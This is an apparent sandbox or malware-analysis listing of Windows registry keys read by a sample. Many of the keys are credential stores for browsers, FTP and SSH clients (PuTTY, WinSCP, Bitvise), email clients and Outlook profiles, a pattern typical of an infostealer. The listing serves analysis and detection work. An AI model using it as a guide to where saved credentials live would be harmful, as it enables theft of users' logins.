HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\v4.0_policy.4.0.System.Runtime.Remoting__b77a5c561934e089 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.4.0.System.Runtime.Remoting__b77a5c561934e089 HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\GRE_Initialize HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\GRE_Initialize\DisableMetaFiles HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\FORCE_ASSEMREF_DUPCHECK HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\NicPath HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\RegistryRoot HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\AssemblyPath HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\AssemblyPath2 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\Mozilla Firefox HKEY_LOCAL_MACHINE\SOFTWARE\ComodoGroup\IceDragon\Setup HKEY_LOCAL_MACHINE\SOFTWARE\Apple Computer, Inc.\Safari HKEY_LOCAL_MACHINE\SOFTWARE\K-Meleon HKEY_LOCAL_MACHINE\SOFTWARE\mozilla.org\SeaMonkey HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\SeaMonkey HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\Flock HKEY_CURRENT_USER\Software\QtWeb.NET\QtWeb Internet Browser\AutoComplete HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\IntelliForms\Storage2 HKEY_LOCAL_MACHINE\SOFTWARE\8pecxstudios\Cyberfox86 HKEY_LOCAL_MACHINE\SOFTWARE\8pecxstudios\Cyberfox HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\Pale Moon HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\Waterfox HKEY_CURRENT_USER\Software\LinasFTP\Site Manager HKEY_CURRENT_USER\Software\FlashPeak\BlazeFtp\Settings HKEY_CURRENT_USER\Software\Ghisler\Total Commander HKEY_CURRENT_USER\Software HKEY_CURRENT_USER\Software\Adobe HKEY_CURRENT_USER\Software\AppDataLow HKEY_CURRENT_USER\Software\JavaSoft HKEY_CURRENT_USER\Software\Macromedia HKEY_CURRENT_USER\Software\Microsoft HKEY_CURRENT_USER\Software\Netscape HKEY_CURRENT_USER\Software\ODBC HKEY_CURRENT_USER\Software\Policies HKEY_CURRENT_USER\Software\Wow6432Node HKEY_CURRENT_USER\Software\Far\Plugins\FTP\Hosts HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\Hosts HKEY_CURRENT_USER\Software\Bitvise\BvSshClient HKEY_CURRENT_USER\Software\VanDyke\SecureFX HKEY_LOCAL_MACHINE\Software\NCH Software\Fling\Accounts HKEY_CURRENT_USER\Software\NCH Software\Fling\Accounts HKEY_LOCAL_MACHINE\Software\NCH Software\ClassicFTP\FTPAccounts HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccounts HKEY_CURRENT_USER\Software\9bis.com\KiTTY\Sessions HKEY_CURRENT_USER\Software\SimonTatham\PuTTY\Sessions HKEY_LOCAL_MACHINE\Software\SimonTatham\PuTTY\Sessions HKEY_LOCAL_MACHINE\Software\9bis.com\KiTTY\Sessions HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\Mozilla Thunderbird HKEY_CURRENT_USER\Software\IncrediMail\Identities HKEY_LOCAL_MACHINE\Software\IncrediMail\Identities HKEY_CURRENT_USER\Software\Martin Prikryl HKEY_LOCAL_MACHINE\Software\Martin Prikryl HKEY_LOCAL_MACHINE\SOFTWARE\Postbox\Postbox HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\FossaMail HKEY_CURRENT_USER\Software\WinChips\UserAccounts HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\00471e98b7a362469ed97e3915fd4111 HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\00471e98b7a362469ed97e3915fd4111\Email HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\0a0d020000000000c000000000000046 HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\0a0d020000000000c000000000000046\Email HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\10b0e4d6eb1de34dabd532a0806a0fec HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\10b0e4d6eb1de34dabd532a0806a0fec\Email HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45a HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45a\Email HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\192e64c97bf3a54488a039619c763627 HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\192e64c97bf3a54488a039619c763627\Email HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\32a3dc9c400a4b448b60ab7fe553a392 HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\32a3dc9c400a4b448b60ab7fe553a392\Email HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\3517490d76624c419a828607e2a54604 HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\3517490d76624c419a828607e2a54604\Email HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\43e0bb79f0f2d84db98ff4f730d23d24 HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\43e0bb79f0f2d84db98ff4f730d23d24\Email HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\6a50d9bd87f9a8478751861a1591a6c2 HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\6a50d9bd87f9a8478751861a1591a6c2\Email HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\7760e21103136b47946c9c80fa097f15 HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\7760e21103136b47946c9c80fa097f15\Email HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\7d19c9e894f20d4780a31c9a9f17da11 HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\7d19c9e894f20d4780a31c9a9f17da11\Email HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\818ecc2f310b344f807e8af5dc013189 HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\818ecc2f310b344f807e8af5dc013189\Email HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\8503020000000000c000000000000046 HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\8503020000000000c000000000000046\Email HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9207f3e0a3b11019908b08002b2a56c2 HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9207f3e0a3b11019908b08002b2a56c2\Email HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\Email HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001\Email HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002\Email HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003\Email HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ddb0922fc50b8d42be5a821ede840761 HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ddb0922fc50b8d42be5a821ede840761\Email HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f86ed2903a4a11cfb57e524153480001 HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f86ed2903a4a11cfb57e524153480001\Email HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E} HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Email HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Calendar Summary HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Calendar Summary\Email HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook HKEY_CURRENT_USER\SOFTWARE\flaska.net\trojita HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\LanmanWorkstation\Parameters HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\LanmanWorkstation\Parameters\RpcCacheTimeout HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\DcomLaunch HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\DcomLaunch\ObjectName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RpcEptMapper HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RpcEptMapper\ObjectName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RpcSs HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RpcSs\ObjectName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VaultSvc HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VaultSvc\ObjectName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VaultSvc\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VaultSvc\WOW64 HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\ProfileList HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\ProgramData HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\Public HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\Default HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ProgramFilesDir HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CommonFilesDir HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ProgramFilesDir (x86) HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CommonFilesDir (x86) HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ProgramW6432Dir HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CommonW6432Dir HKEY_USERS\S-1-5-18 HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\ProfileList\S-1-5-18 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\S-1-5-18\ProfileImagePath HKEY_USERS\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders HKEY_USERS\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\AppData HKEY_USERS\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\Local AppData HKEY_USERS\.DEFAULT\Environment HKEY_USERS\.DEFAULT\Volatile Environment HKEY_USERS\.DEFAULT\Volatile Environment\0 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VaultSvc\Environment HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VaultSvc\RequiredPrivileges HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\lsass.exe HKEY_USERS\S-1-5-21-1822907384-1282624486-319450072-1000 HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\ProfileList\S-1-5-21-1822907384-1282624486-319450072-1000 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\S-1-5-21-1822907384-1282624486-319450072-1000\ProfileImagePath HKEY_USERS\S-1-5-21-1822907384-1282624486-319450072-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders HKEY_USERS\S-1-5-21-1822907384-1282624486-319450072-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\AppData HKEY_USERS\S-1-5-21-1822907384-1282624486-319450072-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\Local AppData HKEY_USERS\S-1-5-21-1822907384-1282624486-319450072-1000\Environment HKEY_USERS\S-1-5-21-1822907384-1282624486-319450072-1000\Volatile Environment HKEY_USERS\S-1-5-21-1822907384-1282624486-319450072-1000\Volatile Environment\0 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\EventSystem HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\EventSystem\ObjectName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\BITS HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\BITS\ObjectName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\BITS\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\BITS\WOW64 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\BITS\RequiredPrivileges HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\BITS\Type HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\BITS\Start HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\BITS\ErrorControl HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\BITS\Tag HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\BITS\DependOnService HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\BITS\DependOnGroup HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\BITS\Group HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\clr_optimization_v4.0.30319_32 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\clr_optimization_v4.0.30319_32\ObjectName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\clr_optimization_v4.0.30319_32\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\clr_optimization_v4.0.30319_32\WOW64 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\clr_optimization_v4.0.30319_32\Environment HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\clr_optimization_v4.0.30319_32\RequiredPrivileges HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\clr_optimization_v4.0.30319_32\Start HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\clr_optimization_v4.0.30319_64 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\clr_optimization_v4.0.30319_64\ObjectName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\clr_optimization_v4.0.30319_64\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\clr_optimization_v4.0.30319_64\WOW64 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\clr_optimization_v4.0.30319_64\Environment HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\clr_optimization_v4.0.30319_64\RequiredPrivileges HKEY_CURRENT_USER\Software\Classes\AppID\taskhost.exe HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\WDI\DiagnosticModules HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{15fba3b8-a37a-4f91-bdba-fbb98fe804bf} HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{15fba3b8-a37a-4f91-bdba-fbb98fe804bf}\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{15fba3b8-a37a-4f91-bdba-fbb98fe804bf}\NeverLowerPagePriority HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{15fba3b8-a37a-4f91-bdba-fbb98fe804bf}\NameResource HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{282396b2-6c46-4d66-b413-70b0445df33c} HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{282396b2-6c46-4d66-b413-70b0445df33c}\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{282396b2-6c46-4d66-b413-70b0445df33c}\NeverLowerPagePriority HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{282396b2-6c46-4d66-b413-70b0445df33c}\NameResource HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{284ddb2f-beea-4c9d-91e8-e3670ed91517} HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{284ddb2f-beea-4c9d-91e8-e3670ed91517}\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{284ddb2f-beea-4c9d-91e8-e3670ed91517}\NeverLowerPagePriority HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{284ddb2f-beea-4c9d-91e8-e3670ed91517}\NameResource HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{3EA6B3DF-393E-41C3-9885-29EC5A701926} HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{3EA6B3DF-393E-41C3-9885-29EC5A701926}\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{3EA6B3DF-393E-41C3-9885-29EC5A701926}\NeverLowerPagePriority HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{3EA6B3DF-393E-41C3-9885-29EC5A701926}\NameResource HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{45DE1EA9-10BC-4f96-9B21-4B6B83DBF476} HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{45DE1EA9-10BC-4f96-9B21-4B6B83DBF476}\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{45DE1EA9-10BC-4f96-9B21-4B6B83DBF476}\NeverLowerPagePriority HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{45DE1EA9-10BC-4f96-9B21-4B6B83DBF476}\NameResource HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{4d21da64-fd02-4b82-a0a5-783266e430ab} HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{4d21da64-fd02-4b82-a0a5-783266e430ab}\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{4d21da64-fd02-4b82-a0a5-783266e430ab}\NeverLowerPagePriority HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{4d21da64-fd02-4b82-a0a5-783266e430ab}\NameResource HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{50e3b0eb-5780-49de-9eb5-8d53a51fd146} HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{50e3b0eb-5780-49de-9eb5-8d53a51fd146}\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{50e3b0eb-5780-49de-9eb5-8d53a51fd146}\NeverLowerPagePriority HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{50e3b0eb-5780-49de-9eb5-8d53a51fd146}\NameResource HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{5C85A128-86F7-41a4-B655-BEE3F2ADEF46} HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{5C85A128-86F7-41a4-B655-BEE3F2ADEF46}\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{5C85A128-86F7-41a4-B655-BEE3F2ADEF46}\NeverLowerPagePriority HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{5C85A128-86F7-41a4-B655-BEE3F2ADEF46}\NameResource HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{5EE64AFB-398D-4edb-AF71-3B830219ABF7} HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{5EE64AFB-398D-4edb-AF71-3B830219ABF7}\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{5EE64AFB-398D-4edb-AF71-3B830219ABF7}\NeverLowerPagePriority HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{5EE64AFB-398D-4edb-AF71-3B830219ABF7}\NameResource HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{63e0d0f7-ac2f-493b-a7f2-2f3ccdb66fca} HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{63e0d0f7-ac2f-493b-a7f2-2f3ccdb66fca}\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{63e0d0f7-ac2f-493b-a7f2-2f3ccdb66fca}\NeverLowerPagePriority HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{63e0d0f7-ac2f-493b-a7f2-2f3ccdb66fca}\NameResource HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{67f1ec80-6c5b-43bb-860b-d47ae85242b1} HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{67f1ec80-6c5b-43bb-860b-d47ae85242b1}\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{67f1ec80-6c5b-43bb-860b-d47ae85242b1}\NeverLowerPagePriority HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{67f1ec80-6c5b-43bb-860b-d47ae85242b1}\NameResource HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{72dbb5ac-6a91-46e6-885b-d429828bea2e} HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{72dbb5ac-6a91-46e6-885b-d429828bea2e}\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{72dbb5ac-6a91-46e6-885b-d429828bea2e}\NeverLowerPagePriority HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{72dbb5ac-6a91-46e6-885b-d429828bea2e}\NameResource HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{7a54f16f-a73a-4258-ba46-a1e998a6aa74} HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{7a54f16f-a73a-4258-ba46-a1e998a6aa74}\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{7a54f16f-a73a-4258-ba46-a1e998a6aa74}\NeverLowerPagePriority HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{7a54f16f-a73a-4258-ba46-a1e998a6aa74}\NameResource HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{85e0acd9-809a-482b-b60b-bcad1f8d0cd7} HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{85e0acd9-809a-482b-b60b-bcad1f8d0cd7}\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{85e0acd9-809a-482b-b60b-bcad1f8d0cd7}\NeverLowerPagePriority HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{85e0acd9-809a-482b-b60b-bcad1f8d0cd7}\NameResource HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{88d4896f-f553-446a-9c75-9dec124ff8b7} HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{88d4896f-f553-446a-9c75-9dec124ff8b7}\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{88d4896f-f553-446a-9c75-9dec124ff8b7}\NeverLowerPagePriority HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{88d4896f-f553-446a-9c75-9dec124ff8b7}\NameResource HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{8CC29128-0B57-4a2b-A7B9-A74A70BA6FA1} HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{8CC29128-0B57-4a2b-A7B9-A74A70BA6FA1}\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{8CC29128-0B57-4a2b-A7B9-A74A70BA6FA1}\NeverLowerPagePriority HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{8CC29128-0B57-4a2b-A7B9-A74A70BA6FA1}\NameResource HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{8d39bd5b-81f8-4b94-a608-6a50bbff5d15} HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{8d39bd5b-81f8-4b94-a608-6a50bbff5d15}\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{8d39bd5b-81f8-4b94-a608-6a50bbff5d15}\NeverLowerPagePriority 